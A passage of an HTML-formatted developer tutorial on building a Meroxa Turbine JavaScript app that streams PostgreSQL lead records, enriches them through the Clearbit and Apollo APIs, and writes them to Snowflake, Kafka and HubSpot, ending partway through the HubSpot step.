&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Confluent Cloud Kafka Cluster (Optional)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;/h3&gt;
&lt;p&gt;Once you have created a &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; account and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, you can follow these steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI. You can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL, Snowflake, and Kafka resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Guide on configuring your Postgres&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;leadsapp_pg&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create leadsapp_pg &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Snowflake&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/snowflake&quot;&gt;Guide on setting up Snowflake&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below, we are creating a Snowflake DB connection named &lt;code class=&quot;language-text&quot;&gt;snowflake&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create snowflake &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; snowflakedb &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;snowflake://&lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_URL&lt;/span&gt;/meroxa_db/stream_data&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;--username&lt;/span&gt; meroxa_user &lt;span class=&quot;token parameter variable&quot;&gt;--password&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_PRIVATE_KEY&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Apache Kafka&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/confluentcloud&quot;&gt;Guide on setting up Confluent Cloud/Kafka&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Here we are creating a Kafka connection named &lt;code class=&quot;language-text&quot;&gt;apachekafka&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create apachekafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type kafka \
  --url &quot;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 Meroxa Data apps do not necessarily need destination resources. If you would just like to read data from a source like PostgreSQL and call APIs, you can skip the above.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing Turbine in JavaScript&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init leadsapp &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coding our Resources&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;leadsapp&lt;/code&gt; folder in your preferred IDE. You will find boilerplate code that shows where to wire up the sources and destinations you named in Step 1. In our case, we just need the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// In our case we named it leadsapp_pg&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;leadsapp_pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to access in your PostgreSQL DB&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;leads&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Third, Process each record that comes in! ProcessData is our function that will call the APIs (See more below)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; processed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;processData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Fourth, identify your Snowflake DB &amp;amp; Kafka destination names configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destinationSnowflake &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;snowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destinationKafka &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;apachekafka&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which table or topic to write that data to&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destinationSnowflake&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;leads_from_pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destinationKafka&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;leads_from_pg_topic&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coding our APIs&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;await turbine.process&lt;/code&gt; allows us to write a function that runs on each record. Here we can call our Clearbit, Apollo &amp;#x26; HubSpot APIs in real-time.&lt;/p&gt;
&lt;p&gt;💡 This code can be found in the app&apos;s GitHub repo &lt;a href=&quot;https://github.com/meroxa/leadsapp&quot;&gt;here&lt;/a&gt;. The functions used to make the API calls are also in the repo: &lt;a href=&quot;https://github.com/meroxa/leadsapp/blob/main/clearbit.js&quot;&gt;getDomainNameFromClearbit&lt;/a&gt;, &lt;a href=&quot;https://github.com/meroxa/leadsapp/blob/main/apollo.js&quot;&gt;getContactsFromApollo&lt;/a&gt;, and &lt;a href=&quot;https://github.com/meroxa/leadsapp/blob/main/hubspot.js&quot;&gt;_generateContactDataForHubspot, createHubspotContact, addHubspotContactToList&lt;/a&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;processData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Loop through each Postgres record&lt;/span&gt;
  records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// Extract the company name from the Postgres row (Ex: Apple)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; companyName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;company_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] companyName:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; companyName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;companyName &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; companyName&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get companyName from record. companyName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;people&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Could not get companyName from record. companyName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Get the company&apos;s Domain Name (Ex: Apple -&gt; Apple.com)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; domainName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;getDomainNameFromClearbit&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] domainName via:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; domainName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;domainName &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; domainName&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get domainName via getDomainNameFromClearbit. domainName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;domainName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;people&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Could not get domainName via getDomainNameFromClearbit. domainName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;domainName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Call Apollo search API to get contact information on the CTO and VP of Engineering roles&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contacts &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;getContactsFromApollo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;domainName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;VP of Engineering&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;CTO&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;contacts &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; contacts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get contacts via getContactsFromApollo. contacts: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;contacts&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;people&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Could not get contacts via getContactsFromApollo. contacts: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;contacts&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    contacts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;contact&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;// Generate a Contact object using data from Apollo&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;_generateContactDataForHubspot&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contact&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] contactData for createHubspotContact:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; contactData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      &lt;span class=&quot;token comment&quot;&gt;// Add a new contact column to the Postgres record, which we will write to Snowflake&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;contact&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;contactData&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      &lt;span class=&quot;token comment&quot;&gt;// Create a HubSpot Contact&lt;/span&gt;
